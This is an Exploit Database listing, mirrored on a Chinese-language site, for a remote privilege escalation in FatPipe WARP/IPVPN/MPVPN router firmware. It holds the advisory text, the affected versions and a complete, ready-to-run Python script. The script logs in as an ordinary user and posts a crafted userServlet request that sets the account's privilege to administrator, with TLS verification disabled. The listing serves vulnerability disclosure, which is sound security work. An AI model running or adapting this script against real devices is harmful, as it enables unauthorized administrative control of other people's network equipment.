FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 – Remote Privilege Escalation

• Exploit Database
• 124 阅读

• 作者： LiquidWorm
  日期： 2021-09-28
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50342/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192

  # Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com   #!/usr/bin/env python3 # # # FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation # # # Vendor: FatPipe Networks Inc. # Product web page: https://www.fatpipeinc.com # Affected version: WARP / IPVPN / MPVPN # 10.2.2r38 # 10.2.2r25 # 10.2.2r10 # 10.1.2r60p82 # 10.1.2r60p71 # 10.1.2r60p65 # 10.1.2r60p58s1 # 10.1.2r60p58 # 10.1.2r60p55 # 10.1.2r60p45 # 10.1.2r60p35 # 10.1.2r60p32 # 10.1.2r60p13 # 10.1.2r60p10 # 9.1.2r185 # 9.1.2r180p2 # 9.1.2r165 # 9.1.2r164p5 # 9.1.2r164p4 # 9.1.2r164 # 9.1.2r161p26 # 9.1.2r161p20 # 9.1.2r161p17 # 9.1.2r161p16 # 9.1.2r161p12 # 9.1.2r161p3 # 9.1.2r161p2 # 9.1.2r156 # 9.1.2r150 # 9.1.2r144 # 9.1.2r129 # 7.1.2r39 # 6.1.2r70p75-m # 6.1.2r70p45-m # 6.1.2r70p26 # 5.2.0r34 # # Summary: FatPipe Networks invented the concept of router-clustering, # which provides the highest level of reliability, redundancy, and speed # of Internet traffic for Business Continuity and communications. FatPipe # WARP achieves fault tolerance for companies by creating an easy method # of combining two or more Internet connections of any kind over multiple # ISPs. FatPipe utilizes all paths when the lines are up and running, # dynamically balancing traffic over the multiple lines, and intelligently # failing over inbound and outbound IP traffic when ISP services and/or # components fail. # # FatPipe IPVPN balances load and provides reliability among multiple # managed and CPE based VPNs as well as dedicated private networks. FatPipe # IPVPN can also provide you an easy low-cost migration path from private # line, Frame or Point-to-Point networks. You can aggregate multiple private, # MPLS and public networks without additional equipment at the provider's # site. # # FatPipe MPVPN, a patented router clustering device, is an essential part # of Disaster Recovery and Business Continuity Planning for Virtual Private # Network (VPN) connectivity. It makes any VPN up to 900% more secure and # 300% times more reliable, redundant and faster. MPVPN can take WANs with # an uptime of 99.5% or less and make them 99.999988% or higher, providing # a virtually infallible WAN. MPVPN dynamically balances load over multiple # lines and ISPs without the need for BGP programming. MPVPN aggregates up # to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed # you need to keep your VPN up and running despite failures of service, line, # software, or hardware. # # Desc: The application suffers from a privilege escalation vulnerability. # A normal user (group USER, 0) can elevate her privileges by sending a HTTP # POST request and setting the JSON parameter 'privilege' to integer value # '1' gaining administrativerights (group ADMINISTRATOR, 1). # # Tested on: Apache-Coyote/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5685 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php # # # 30.05.2016 # 25.07.2021 # #   import sys import time####### import requests################ requests.packages.urllib3.disable_warnings()   if len(sys.argv) !=2: print print("********************************************************") print("**") print("* Privilege escalation from USER to ADMINISTRATOR role *") print("*in*") print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *") print("**") print("* ZSL-2021-5685*") print("**") print("********************************************************") print("\n[POR] Usage: ./escalator.py [IP]") sys.exit()   ajpi=sys.argv[1] print juzer=raw_input("[UNE] Username: ") pasvord=raw_input("[UNE] Password: ")   sesija=requests.session() logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}   hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"', 'Accept':'application/json, text/javascript, */*; q=0.01', 'X-Requested-With':'XMLHttpRequest', 'Sec-Ch-Ua-Mobile':'?0', 'User-Agent':'Fatnet/1.b', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Origin':'https://'+ajpi, 'Sec-Fetch-Site':'same-origin', 'Sec-Fetch-Mode':'cors', 'Sec-Fetch-Dest':'empty', 'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet', 'Accept-Encoding' :'gzip, deflate', 'Accept-Language' :'en-US,en;q=0.9', 'Connection':'close'}   juarel1='https://'+ajpi+'/fpui/loginServlet' alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)   if not 'success' in alo.text: print('[GRE] Login error.') sys.exit() else: print('[POR] Authentication successful.')   print('[POR] Climbing the ladder...')   sluba=''' |||| .--._ ||====|| __ '---._) ||||"")\ Q Q ) ||====|| =_/ o/ |||| | \_.-;-'-,._ ||====|| |'o---o ) ||||\ /H __H\/ ||====|| '-' \"")\/| |||| _ |_='-)_/ ||====||/'.) |||| / / ||====|||___/\| / |||| |_|| | ||====||/)\\ \\ |||| (__/\___\\ ||====|| \_\\ |||| /) ||====||(__/ '''   for k in sluba: sys.stdout.write(k) sys.stdout.flush() time.sleep(0.01)   juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest' posta={ 'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]' } stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)   if not 'true' in stanje.text: print('\n[GRE] Something\'s fishy!') sys.exit() else: print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.') sys.exit()